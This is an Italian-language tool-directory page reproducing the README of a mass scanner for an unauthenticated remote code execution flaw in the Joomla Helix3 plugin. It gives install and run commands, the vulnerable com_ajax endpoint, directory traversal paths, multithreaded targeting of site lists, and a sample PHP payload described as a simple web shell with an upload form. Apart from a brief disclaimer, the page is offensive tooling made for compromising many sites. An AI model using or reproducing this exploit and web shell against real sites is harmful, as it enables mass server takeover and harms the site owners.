Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-49049 — Scanner di vulnerabilità di massa per CVE-2026-49049 – Esecuzione remota di codice non autenticata nel plugin Joomla Helix3. Multi-thread, rileva sia payload PHP eseguiti che grezzi. | Kitploit
Strumenti/GitHubGitHub/jenderal92/cve-2026-49049
Scanner di VulnerabilitàScanner di Vulnerabilità WebGenerazione di PayloadExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubjenderal92/cve-2026-49049

CVE-2026-49049

Scanner di vulnerabilità di massa per CVE-2026-49049 – Esecuzione remota di codice non autenticata nel plugin Joomla Helix3. Multi-thread, rileva sia payload PHP eseguiti che grezzi.

Vedi Repository
121 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Scanner di massa CVE-2026-49049

Scanner di massa per vulnerabilità CVE-2026-49049 - Esecuzione remota di codice non autenticata nel framework Helix3 di Joomla.


📌 Descrizione

Questo strumento verifica più siti Joomla per la vulnerabilità CVE-2026-49049 presente nel plugin Helix3. La vulnerabilità consente a un attaccante non autenticato di caricare ed eseguire codice PHP arbitrario sul server di destinazione.

Lo scanner tenta di:

  1. Sfruttare l'endpoint com_ajax con il plugin helix3.
  2. Caricare un file PHP informativo/payload innocuo.
  3. Rilevare se il file viene eseguito o semplicemente archiviato come PHP grezzo.

⚡ Funzionalità

  • Scansione di massa con multithreading (20 thread predefiniti).
  • Due modalità di rilevamento:
    • ✅ Vulnerabile – Il codice PHP viene eseguito (RCE riuscita).
    • ⚠️ PHP grezzo – Il file viene caricato ma non eseguito (divulgazione del codice).
  • Generazione automatica del payload con nomi di file casuali.
  • Output salvato in file separati per ulteriori analisi.
  • Leggero e veloce con gestione del timeout.

📦 Prerequisiti

  • Python 2.7
  • Libreria requests
pip install requests

🛠 Installazione

git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py

🚀 Utilizzo

python2 cve-2026-49049.py targets.txt

Formato di input

Ogni riga in targets.txt deve contenere un dominio o un IP:

example.com
https://example.com
http://192.168.1.100

File di output

File Descrizione results.txt URL vulnerabili in cui il payload è stato eseguito rez.txt URL in cui il payload è stato caricato ma non eseguito (PHP grezzo)


Esempio di output

============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================

[*] Loaded 150 targets
[*] Using 20 threads

[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com

============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5

[+] Vulnerable URLs:
    https://target.com/tmp_123456.php.json

⚙️ Configurazione

Puoi modificare le seguenti variabili all'interno dello script:

Variabile Default Descrizione THREADS 20 Numero di thread concorrenti PATHS ['../../../', '../../../../'] Percorsi di directory traversal TIMEOUT 5 Timeout delle richieste HTTP RESULT_FILE 'results.txt' File di output per i siti vulnerabili RAW_RESULT_FILE 'rez.txt' File di output per i siti con PHP grezzo


🧠 Come funziona

Lo script invia una richiesta POST a:

/index.php?option=com_ajax&plugin=helix3&format=json

con un payload che:

  1. Specifica un percorso di directory traversal (ad es. ../../../)
  2. Carica un file PHP con un nome casuale
  3. Contiene una semplice web shell / pagina informativa

Poi verifica se il file è accessibile e se il codice PHP viene eseguito o semplicemente mostrato come testo semplice.

Esempio di payload

<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a scopi didattici e a test autorizzati.

L'uso non autorizzato di questo strumento contro sistemi di cui non si possiede la proprietà o per i quali non si dispone di un permesso esplicito di test è illegale. L'autore non è responsabile di qualsiasi uso improprio o danno causato da questo strumento.

Per ulteriori disclaimer, puoi consultare la copertina di Jenderal92. Puoi verificarlo QUI !!!


Scarica lo strumento